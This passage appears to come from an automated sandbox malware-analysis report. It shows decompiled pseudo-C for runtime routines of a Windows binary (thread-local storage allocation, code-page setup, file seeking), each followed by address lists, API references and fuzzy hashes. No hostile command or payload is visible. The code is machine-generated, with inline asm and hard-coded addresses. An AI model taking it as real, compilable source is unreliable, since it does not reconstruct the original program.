				_t6 = E00CEAC98(3, "FlsAlloc", 0xcf7938, "FlsAlloc"); // executed
				_t18 = _t6;
				if(_t18 == 0) {
					_t7 = TlsAlloc();
				} else {
					 *0xcf3278(_a4);
					_t7 =  *_t18();
				}
				_pop(_t19);
				return E00CDFBBC(_t7, _t10, _v8 ^ _t20, _t15, _t16, _t19);
			}














                                                    0x00ceadaf
                                                    0x00ceadaf
                                                    0x00ceadb4
                                                    0x00ceadb5
                                                    0x00ceadbc
                                                    0x00ceadd1
                                                    0x00ceadd6
                                                    0x00ceaddd
                                                    0x00ceadee
                                                    0x00ceaddf
                                                    0x00ceade4
                                                    0x00ceadea
                                                    0x00ceadea
                                                    0x00ceadf9
                                                    0x00ceae02

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Alloc
                                                    • String ID: FlsAlloc
                                                    • API String ID: 2773662609-671089009
                                                    • Opcode ID: c782a24ec3ea585948f0adb4b35a2eefad96fca54ed40ba65057072e5a0fc4cc
                                                    • Instruction ID: 798005b770d6f0a61d9d0bf933d7c9e5a7d2a6c30a0f44cb9ffa47f3445649a8
                                                    • Opcode Fuzzy Hash: c782a24ec3ea585948f0adb4b35a2eefad96fca54ed40ba65057072e5a0fc4cc
                                                    • Instruction Fuzzy Hash: 4DE0E531A4521C7BC611AB66DC06F7EBB54DB04B21B0142AAF90597250CDB16F11D6DB
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CEBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 90%
                                                    			E00CEBBF0(void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __esi;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed int _t60;
				signed char _t62;
				signed int _t63;
				signed char* _t71;
				signed char* _t72;
				int _t75;
				signed int _t78;
				signed char* _t79;
				short* _t80;
				int _t84;
				signed char _t85;
				signed int _t86;
				signed int _t89;
				signed int _t90;
				int _t92;
				int _t93;
				intOrPtr _t95;
				signed int _t96;

				_t91 = __edi;
				_t48 =  *0xcfe7ac; // 0x349e4b74
				_v8 = _t48 ^ _t96;
				_t95 = _a8;
				_t75 = E00CEB7BB(__eflags, _a4);
				if(_t75 != 0) {
					_push(__edi);
					_t92 = 0;
					__eflags = 0;
					_t78 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0xcfe978)) - _t75;
						if( *((intOrPtr*)(_t51 + 0xcfe978)) == _t75) {
							break;
						}
						_t78 = _t78 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t78;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t75 - 0xfde8;
							if(_t75 == 0xfde8) {
								L23:
								_t60 = _t51 | 0xffffffff;
							} else {
								__eflags = _t75 - 0xfde9;
								if(_t75 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t75 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t75,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0xd226c4 - _t92; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E00CEB82E(_t95);
												goto L37;
											}
										} else {
											E00CDFFF0(_t92, _t95 + 0x18, _t92, 0x101);
											 *(_t95 + 4) = _t75;
											 *(_t95 + 0x21c) = _t92;
											_t75 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t95 + 8) = _t92;
											} else {
												__eflags = _v22;
												_t71 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t85 = _t71[1];
														__eflags = _t85;
														if(_t85 == 0) {
															goto L16;
														}
														_t89 = _t85 & 0x000000ff;
														_t86 =  *_t71 & 0x000000ff;
														while(1) {
															__eflags = _t86 - _t89;
															if(_t86 > _t89) {
																break;
															}
															 *(_t95 + _t86 + 0x19) =  *(_t95 + _t86 + 0x19) | 0x00000004;
															_t86 = _t86 + 1;
															__eflags = _t86;
														}
														_t71 =  &(_t71[2]);
														__eflags =  *_t71;
														if( *_t71 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t72 = _t95 + 0x1a;
												_t84 = 0xfe;
												do {
													 *_t72 =  *_t72 | 0x00000008;
													_t72 =  &(_t72[1]);
													_t84 = _t84 - 1;
													__eflags = _t84;
												} while (_t84 != 0);
												 *(_t95 + 0x21c) = E00CEB77D( *(_t95 + 4));
												 *(_t95 + 8) = _t75;
											}
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00CEB893(_t89, _t95); // executed
											L37:
											_t60 = 0;
											__eflags = 0;
										}
									}
								}
							}
						}
						_pop(_t91);
						goto L39;
					}
					E00CDFFF0(_t92, _t95 + 0x18, _t92, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0xcfe988;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t79 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t79[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t90 =  *_t79 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t90 - _t63;
									if(_t90 > _t63) {
										break;
									}
									__eflags = _t90 - 0x100;
									if(_t90 < 0x100) {
										_t31 = _t92 + 0xcfe970; // 0x8040201
										 *(_t95 + _t90 + 0x19) =  *(_t95 + _t90 + 0x19) |  *_t31;
										_t90 = _t90 + 1;
										__eflags = _t90;
										_t63 = _t79[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t79 =  &(_t79[2]);
								__eflags =  *_t79;
								if( *_t79 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t92 = _t92 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t95 + 4) = _t75;
					 *(_t95 + 8) = 1;
					 *(_t95 + 0x21c) = E00CEB77D(_t75);
					_t80 = _t95 + 0xc;
					_t89 = _v36 + 0xcfe97c;
					_t93 = 6;
					do {
						_t58 =  *_t89;
						_t89 = _t89 + 2;
						 *_t80 = _t58;
						_t80 = _t80 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L36;
				} else {
					E00CEB82E(_t95);
					_t60 = 0;
				}
				L39:
				return E00CDFBBC(_t60, _t75, _v8 ^ _t96, _t89, _t91, _t95);
			}

































                                                    0x00cebbf0
                                                    0x00cebbf8
                                                    0x00cebbff
                                                    0x00cebc07
                                                    0x00cebc0f
                                                    0x00cebc14
                                                    0x00cebc24
                                                    0x00cebc25
                                                    0x00cebc25
                                                    0x00cebc27
                                                    0x00cebc29
                                                    0x00cebc2b
                                                    0x00cebc2e
                                                    0x00cebc2e
                                                    0x00cebc34
                                                    0x00000000
                                                    0x00000000
                                                    0x00cebc3a
                                                    0x00cebc3b
                                                    0x00cebc3e
                                                    0x00cebc41
                                                    0x00cebc46
                                                    0x00000000
                                                    0x00cebc48
                                                    0x00cebc48
                                                    0x00cebc4e
                                                    0x00cebd1c
                                                    0x00cebd1c
                                                    0x00cebc54
                                                    0x00cebc54
                                                    0x00cebc5a
                                                    0x00000000
                                                    0x00cebc60
                                                    0x00cebc64
                                                    0x00cebc6a
                                                    0x00cebc6c
                                                    0x00000000
                                                    0x00cebc72
                                                    0x00cebc77
                                                    0x00cebc7d
                                                    0x00cebc7f
                                                    0x00cebd09
                                                    0x00cebd0f
                                                    0x00000000
                                                    0x00cebd11
                                                    0x00cebd12
                                                    0x00000000
                                                    0x00cebd12
                                                    0x00cebc85
                                                    0x00cebc8f
                                                    0x00cebc94
                                                    0x00cebc9c
                                                    0x00cebca2
                                                    0x00cebca3
                                                    0x00cebca6
                                                    0x00cebcf9
                                                    0x00cebca8
                                                    0x00cebca8
                                                    0x00cebcac
                                                    0x00cebcaf
                                                    0x00cebcb1
                                                    0x00cebcb1
                                                    0x00cebcb4
                                                    0x00cebcb6
                                                    0x00000000
                                                    0x00000000
                                                    0x00cebcb8
                                                    0x00cebcbb
                                                    0x00cebcc6
                                                    0x00cebcc6
                                                    0x00cebcc8
                                                    0x00000000
                                                    0x00000000
                                                    0x00cebcc0
                                                    0x00cebcc5
                                                    0x00cebcc5
                                                    0x00cebcc5
                                                    0x00cebcca
                                                    0x00cebccd
                                                    0x00cebcd0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cebcd0
                                                    0x00cebcb1
                                                    0x00cebcd2
                                                    0x00cebcd2
                                                    0x00cebcd5
                                                    0x00cebcda
                                                    0x00cebcda
                                                    0x00cebcdd
                                                    0x00cebcde
                                                    0x00cebcde
                                                    0x00cebcde
                                                    0x00cebcee
                                                    0x00cebcf4
                                                    0x00cebcf4
                                                    0x00cebd01
                                                    0x00cebd02
                                                    0x00cebd03
                                                    0x00cebdc7
                                                    0x00cebdc8
                                                    0x00cebdcd
                                                    0x00cebdce
                                                    0x00cebdce
                                                    0x00cebdce
                                                    0x00cebc7f
                                                    0x00cebc6c
                                                    0x00cebc5a
                                                    0x00cebc4e
                                                    0x00cebdd0
                                                    0x00000000
                                                    0x00cebdd0
                                                    0x00cebd2e
                                                    0x00cebd36
                                                    0x00cebd36
                                                    0x00cebd3a
                                                    0x00cebd3d
                                                    0x00cebd43
                                                    0x00cebd46
                                                    0x00cebd46
                                                    0x00cebd49
                                                    0x00cebd4b
                                                    0x00cebd4d
                                                    0x00cebd4d
                                                    0x00cebd50
                                                    0x00cebd52
                                                    0x00000000
                                                    0x00000000
                                                    0x00cebd54
                                                    0x00cebd57
                                                    0x00cebd73
                                                    0x00cebd73
                                                    0x00cebd75
                                                    0x00000000
                                                    0x00000000
                                                    0x00cebd5c
                                                    0x00cebd62
                                                    0x00cebd64
                                                    0x00cebd6a
                                                    0x00cebd6e
                                                    0x00cebd6e
                                                    0x00cebd6f
                                                    0x00000000
                                                    0x00cebd6f
                                                    0x00000000
                                                    0x00cebd62
                                                    0x00cebd77
                                                    0x00cebd7a
                                                    0x00cebd7d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cebd7d
                                                    0x00cebd7f
                                                    0x00cebd7f
                                                    0x00cebd82
                                                    0x00cebd83
                                                    0x00cebd86
                                                    0x00cebd89
                                                    0x00cebd89
                                                    0x00cebd8f
                                                    0x00cebd92
                                                    0x00cebda1
                                                    0x00cebdaa
                                                    0x00cebdaf
                                                    0x00cebdb5
                                                    0x00cebdb6
                                                    0x00cebdb6
                                                    0x00cebdb9
                                                    0x00cebdbc
                                                    0x00cebdbf
                                                    0x00cebdc2
                                                    0x00cebdc2
                                                    0x00cebdc2
                                                    0x00000000
                                                    0x00cebc16
                                                    0x00cebc17
                                                    0x00cebc1d
                                                    0x00cebc1d
                                                    0x00cebdd1
                                                    0x00cebde0

                                                    APIs
                                                      • Part of subcall function 00CEB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CEBA44,?), ref: 00CEB7E6
                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00CEBA89,?,00000000), ref: 00CEBC64
                                                    • GetCPInfo.KERNEL32(00000000,00CEBA89,?,?,?,00CEBA89,?,00000000), ref: 00CEBC77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: CodeInfoPageValid
                                                    • String ID:
                                                    • API String ID: 546120528-0
                                                    • Opcode ID: afdb3ecfec0c31f8371759568c61ad1bf5b31b963ccce7e9138e3e51b1325a42
                                                    • Instruction ID: 71cd51073b1634bc6441341065e3b7e72daab67f9279062a53dc5ee5a4624e46
                                                    • Opcode Fuzzy Hash: afdb3ecfec0c31f8371759568c61ad1bf5b31b963ccce7e9138e3e51b1325a42
                                                    • Instruction Fuzzy Hash: A7515470A047D59EDB208F77C8816BBBBE5EF41300F28446ED4A68B262D7359F46DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 60%
                                                    			E00CC9A74(signed int __ecx, long* _a4, signed int _a8, long _a12, signed int _a20, char _a24, long _a4124, long _a4128, long _a4132) {
				signed int _v0;
				long* _v4;
				intOrPtr _v8;
				void* _t30;
				long _t32;
				signed int _t33;
				void* _t35;
				long* _t38;
				void* _t41;
				long _t42;
				signed int _t46;
				long _t50;
				void* _t51;
				long _t52;
				intOrPtr* _t53;
				void* _t57;
				void* _t63;
				signed int _t67;
				signed int _t70;

				E00CDEC50(0x1018);
				_t50 = _a4132;
				_t42 = _a4128;
				_t53 = __ecx;
				_t52 = _a4124;
				_v0 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) == 0xffffffff) {
					L21:
					_t30 = 1;
					L22:
					return _t30;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) != 1) {
					__eflags = _t42;
					if(__eflags > 0) {
						L32:
						_a12 = _t42;
						_t32 = SetFilePointer( *(_t53 + 8), _t52,  &_a12, _t50); // executed
						__eflags = _t32 - 0xffffffff;
						if(_t32 != 0xffffffff) {
							goto L21;
						}
						_t33 = GetLastError();
						asm("sbb al, al");
						_t30 =  ~_t33 + 1;
						goto L22;
					}
					if(__eflags < 0) {
						L27:
						__eflags = _t50;
						if(_t50 == 0) {
							goto L32;
						}
						__eflags = _t50 - 1;
						if(_t50 != 1) {
							_t35 = E00CC981A(_t50);
						} else {
							 *0xcf3278();
							_t35 =  *((intOrPtr*)( *((intOrPtr*)( *_t53 + 0x14))))();
							_t53 = _v0;
						}
						_t52 = _t52 + _t35;
						asm("adc ebx, edx");
						_t50 = 0;
						__eflags = 0;
						goto L32;
					}
					__eflags = _t52;
					if(_t52 >= 0) {
						goto L32;
					}
					goto L27;
				}
				_t38 = __ecx + 0x28;
				_a4 = _t38;
				if(_t50 != 1) {
					__eflags = _t50;
					if(_t50 != 0) {
						L23:
						_t30 = 0;
						goto L22;
					}
					L5:
					_t63 = _t42 - _t38[1];
					if(_t63 < 0 || _t63 <= 0 && _t52 <  *_t38) {
						goto L23;
					} else {
						_t46 = _t42;
						_t57 = _t52 -  *_t38;
						asm("sbb ecx, [eax+0x4]");
						_a8 = _t46;
						if(_t57 != 0 || _t57 != 0) {
							do {
								_t67 = _t46;
								if(_t67 > 0 || _t67 >= 0 && _t57 >= 0x1000) {
									L14:
									_t12 =  &_a20;
									 *_t12 = _a20 & 0x00000000;
									__eflags =  *_t12;
									_t51 = 0x1000;
									goto L15;
								} else {
									_t51 = _t57;
									_a20 = _t46;
									L15:
									 *0xcf3278( &_a24, _t51);
									_t41 =  *((intOrPtr*)( *((intOrPtr*)( *_t53 + 0xc))))();
									if(_t41 <= 0) {
										goto L23;
									}
									_t46 = _v0;
									_t53 = _v8;
									asm("cdq");
									_t57 = _t57 - _t41;
									asm("sbb ecx, edx");
									_v0 = _t46;
									_t70 = _t46;
									if(_t70 > 0) {
										goto L14;
									}
								}
							} while (_t70 >= 0 && _t57 != 0);
							_t38 = _v4;
							goto L20;
						} else {
							L20:
							 *_t38 = _t52;
							_t38[1] = _t42;
							goto L21;
						}
					}
				}
				_t52 = _t52 +  *_t38;
				asm("adc ebx, [eax+0x4]");
				goto L5;
			}






















                                                    0x00cc9a79
                                                    0x00cc9a7e
                                                    0x00cc9a86
                                                    0x00cc9a8f
                                                    0x00cc9a92
                                                    0x00cc9a99
                                                    0x00cc9aa1
                                                    0x00cc9b53
                                                    0x00cc9b53
                                                    0x00cc9b59
                                                    0x00cc9b5f
                                                    0x00cc9b5f
                                                    0x00cc9aab
                                                    0x00cc9b66
                                                    0x00cc9b68
                                                    0x00cc9b9d
                                                    0x00cc9ba2
                                                    0x00cc9bab
                                                    0x00cc9bb1
                                                    0x00cc9bb4
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc9bb6
                                                    0x00cc9bbe
                                                    0x00cc9bc0
                                                    0x00000000
                                                    0x00cc9bc0
                                                    0x00cc9b6a
                                                    0x00cc9b70
                                                    0x00cc9b70
                                                    0x00cc9b72
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc9b74
                                                    0x00cc9b77
                                                    0x00cc9b92
                                                    0x00cc9b79
                                                    0x00cc9b80
                                                    0x00cc9b8a
                                                    0x00cc9b8c
                                                    0x00cc9b8c
                                                    0x00cc9b97
                                                    0x00cc9b99
                                                    0x00cc9b9b
                                                    0x00cc9b9b
                                                    0x00000000
                                                    0x00cc9b9b
                                                    0x00cc9b6c
                                                    0x00cc9b6e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc9b6e
                                                    0x00cc9ab1
                                                    0x00cc9ab4
                                                    0x00cc9abb
                                                    0x00cc9ac4
                                                    0x00cc9ac6
                                                    0x00cc9b62
                                                    0x00cc9b62
                                                    0x00000000
                                                    0x00cc9b62
                                                    0x00cc9acc
                                                    0x00cc9acc
                                                    0x00cc9acf
                                                    0x00000000
                                                    0x00cc9adf
                                                    0x00cc9ae1
                                                    0x00cc9ae3
                                                    0x00cc9ae5
                                                    0x00cc9ae8
                                                    0x00cc9aec
                                                    0x00cc9af2
                                                    0x00cc9af2
                                                    0x00cc9af4
                                                    0x00cc9b08
                                                    0x00cc9b08
                                                    0x00cc9b08
                                                    0x00cc9b08
                                                    0x00cc9b0d
                                                    0x00000000
                                                    0x00cc9b00
                                                    0x00cc9b00
                                                    0x00cc9b02
                                                    0x00cc9b12
                                                    0x00cc9b1f
                                                    0x00cc9b29
                                                    0x00cc9b2d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc9b2f
                                                    0x00cc9b33
                                                    0x00cc9b37
                                                    0x00cc9b38
                                                    0x00cc9b3a
                                                    0x00cc9b3c
                                                    0x00cc9b40
                                                    0x00cc9b42
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc9b42
                                                    0x00cc9b44
                                                    0x00cc9b4a
                                                    0x00000000
                                                    0x00cc9b4e
                                                    0x00cc9b4e
                                                    0x00cc9b4e
                                                    0x00cc9b50
                                                    0x00000000
                                                    0x00cc9b50
                                                    0x00cc9aec
                                                    0x00cc9acf
                                                    0x00cc9abd
                                                    0x00cc9abf
                                                    0x00000000

                                                    APIs
                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00CC9A50,?,?,00000000,?,?,00CC8CBC,?), ref: 00CC9BAB
                                                    • GetLastError.KERNEL32(?,00000000,00CC8411,-00009570,00000000,000007F3), ref: 00CC9BB6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: 12d676219fb2046c684498e276ce6d79fd9d8185fbad3d1d0190f71ce8b517ba
                                                    • Instruction ID: 69131f5ca6b02269df919dd46a9109f01b50819b166a60009209184bd9a576b0
                                                    • Opcode Fuzzy Hash: 12d676219fb2046c684498e276ce6d79fd9d8185fbad3d1d0190f71ce8b517ba
                                                    • Instruction Fuzzy Hash: 9F41DE71604341AFDB34DF15E5A8E6AB7E5FFD4320F158A2DE8A183260D770EE058A51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CEBA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 90%
                                                    			E00CEBA27(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_t68 = __edx;
				_v8 = E00CE97E5(__ebx, __ecx, __edx);
				E00CEBB4E(__ebx, __ecx, __edx, __edi, __esi, _t81);
				_t31 = E00CEB7BB(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t70 = E00CE8E06(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E00CEBBF0(_t68, _t70, __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E00CE8B6F();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0xcfec70;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0xcfec70) {
								E00CE8DCC( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0xcfeef0 & 0x00000001;
							if(( *0xcfeef0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E00CEB691(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0xcfee90; // 0x3392210
									 *0xcfe964 = _t44;
								}
							}
						}
						L6:
						E00CE8DCC(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E00CE91A8())) = 0x16;
						goto L5;
					}
				}
			}
















                                                    0x00ceba27
                                                    0x00ceba27
                                                    0x00ceba34
                                                    0x00ceba37
                                                    0x00ceba3f
                                                    0x00ceba48
                                                    0x00ceba4b
                                                    0x00ceba51
                                                    0x00000000
                                                    0x00ceba53
                                                    0x00ceba57
                                                    0x00ceba58
                                                    0x00ceba59
                                                    0x00ceba64
                                                    0x00ceba66
                                                    0x00ceba6a
                                                    0x00ceba6c
                                                    0x00ceba9c
                                                    0x00ceba9c
                                                    0x00000000
                                                    0x00ceba6e
                                                    0x00ceba7b
                                                    0x00ceba81
                                                    0x00ceba84
                                                    0x00ceba89
                                                    0x00ceba8d
                                                    0x00ceba8f
                                                    0x00cebaae
                                                    0x00cebab2
                                                    0x00cebab4
                                                    0x00cebab4
                                                    0x00cebabf
                                                    0x00cebac3
                                                    0x00cebac4
                                                    0x00cebac6
                                                    0x00cebac9
                                                    0x00cebad0
                                                    0x00cebad5
                                                    0x00cebada
                                                    0x00cebad0
                                                    0x00cebadb
                                                    0x00cebae1
                                                    0x00cebae6
                                                    0x00cebae8
                                                    0x00cebaeb
                                                    0x00cebaee
                                                    0x00cebaf5
                                                    0x00cebaf7
                                                    0x00cebafe
                                                    0x00cebb03
                                                    0x00cebb0c
                                                    0x00cebb11
                                                    0x00cebb17
                                                    0x00cebb19
                                                    0x00cebb1e
                                                    0x00cebb1e
                                                    0x00cebb17
                                                    0x00cebafe
                                                    0x00ceba9e
                                                    0x00ceba9f
                                                    0x00000000
                                                    0x00ceba91
                                                    0x00ceba96
                                                    0x00000000
                                                    0x00ceba96
                                                    0x00ceba8f

                                                    APIs
                                                      • Part of subcall function 00CE97E5: GetLastError.KERNEL32(?,00D01098,00CE4674,00D01098,?,?,00CE40EF,?,?,00D01098), ref: 00CE97E9
                                                      • Part of subcall function 00CE97E5: _free.LIBCMT ref: 00CE981C
                                                      • Part of subcall function 00CE97E5: SetLastError.KERNEL32(00000000,?,00D01098), ref: 00CE985D
                                                      • Part of subcall function 00CE97E5: _abort.LIBCMT ref: 00CE9863
                                                      • Part of subcall function 00CEBB4E: _abort.LIBCMT ref: 00CEBB80
                                                      • Part of subcall function 00CEBB4E: _free.LIBCMT ref: 00CEBBB4
                                                      • Part of subcall function 00CEB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CEBA44,?), ref: 00CEB7E6
                                                    • _free.LIBCMT ref: 00CEBA9F
                                                    • _free.LIBCMT ref: 00CEBAD5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorLast_abort
                                                    • String ID:
                                                    • API String ID: 2991157371-0
                                                    • Opcode ID: c59cbf1c9322bacdae0412e470c3ae4555fe7eeee0328ed43479d675cda7f7a0
                                                    • Instruction ID: 5a12a35f5d17fff7fa183d8c4747a45d32b951403726ea633d4499cc9f65f5aa
                                                    • Opcode Fuzzy Hash: c59cbf1c9322bacdae0412e470c3ae4555fe7eeee0328ed43479d675cda7f7a0
                                                    • Instruction Fuzzy Hash: B431AC31904189AFDF10DF6AE841BBEB7F5EF40324F2540A9E5149B2A1EB715E44FB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E00CC1E50(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t38;
				intOrPtr _t47;
				void* _t68;
				unsigned int _t70;
				signed int _t72;
				intOrPtr* _t74;
				void* _t76;

				_t68 = __edx;
				E00CDEB78(0xcf2673, _t76);
				_t55 = 0;
				 *((intOrPtr*)(_t76 - 0x10)) = __ecx;
				 *((intOrPtr*)(_t76 - 0x24)) = 0;
				 *(_t76 - 0x20) = 0;
				 *((intOrPtr*)(_t76 - 0x1c)) = 0;
				 *((intOrPtr*)(_t76 - 0x18)) = 0;
				 *((char*)(_t76 - 0x14)) = 0;
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t76 - 4)) = 0;
				_push(_t76 - 0x24);
				_t38 = E00CC3BBA(__ecx); // executed
				if(_t38 != 0) {
